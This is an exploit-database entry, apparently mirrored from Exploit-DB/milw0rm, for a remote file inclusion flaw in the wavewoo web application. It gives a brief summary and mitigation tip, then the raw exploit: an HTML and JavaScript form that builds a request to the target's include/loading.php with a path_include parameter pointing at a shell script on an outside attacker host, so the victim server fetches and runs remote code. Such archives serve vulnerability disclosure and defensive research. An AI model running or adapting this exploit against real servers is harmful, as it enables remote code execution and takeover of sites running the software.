header-logo
Suggest Exploit
vendor:
wavewoo
by:
kezzap66345
5.5
CVSS
MEDIUM
Remote File Include
98
CWE
Product Name: wavewoo
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Alessandro Lulli wavewoo Remote File Include Exploit

This is a basic exploit for the Alessandro Lulli wavewoo application that allows remote file inclusion. The exploit uses a specific path and file name to include a shell script hosted on a remote server.

Mitigation:

To mitigate this vulnerability, ensure that input validation and sanitization is implemented to prevent unauthorized file inclusion. Regularly update the application to the latest version to address any security vulnerabilities.
Source

Exploit-DB raw data:

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
<title>Alessandro Lulli wavewoo  Remote File Include Exploit</title>

<script language="JavaScript">

//'===============================================================================================
//'[Script Name: Alessandro Lulli wavewoo
//'[Coded by  : kezzap66345
//'[Author     : kezzap66345
//'[Contact    : kezzap66345@hotmail.com
//'[S.Page     : http://wavewoo.sourceforge.net/
//'[$$         : Free
//'[Download   : http://sourceforge.net/projects/wavewoo/
//'===============================================================================================




    //Basic exploit,but any time : (
  var path="/include"
  var adres="/loading.php?" //File name
  var acik ="path_include=" // Line x
  var shell="http://kezzap66345.by.ru/casus.php?" // Shell Script

  function command(){
      if (document.rfi.target1.value==""){
         alert("Failed..");
     return false;
   }



 rfi.action= document.rfi.target1.value+path+adres+acik+shell;
 rfi.submit(); // Form Submit
  }
</script>

</head>

<body bgcolor="#000000">
<center>

<p><b><font face="Verdana" size="2" color="#008000">Alessandro Lulli wavewoo
Remote File Include Exploit</font></b></p>

<p></p>
<form method="post" target="getting" name="rfi" onSubmit="command();">
   <b><font face="Arial" size="1" color="#FF0000">Target:</font><font
face="Arial" size="1"
color="#808080">[http://[target]/[scriptpath]</font><font color="#00FF00"
size="2" face="Arial">
 </font><font color="#FF0000" size="2"></font></b>
 <input type="text" name="target1" size="20" style="background-color:
#808000" onmouseover="javascript:this.style.background='#808080';"
onmouseout="javascript:this.style.background='#808000';"></p>
 <p><input type="submit" value="Gonder" name="B1"><input type="reset"
value="Sifirla" name="B2"></p>
</form>
<p><br>
<iframe name="getting" height="337" width="633" scrolling="yes"
frameborder="0"></iframe>
</p>

<b><font face="Verdana" size="2" color="#008000">kezzap66345</font></b></p>
</center>
</body>

</html>

# milw0rm.com [2007-04-24]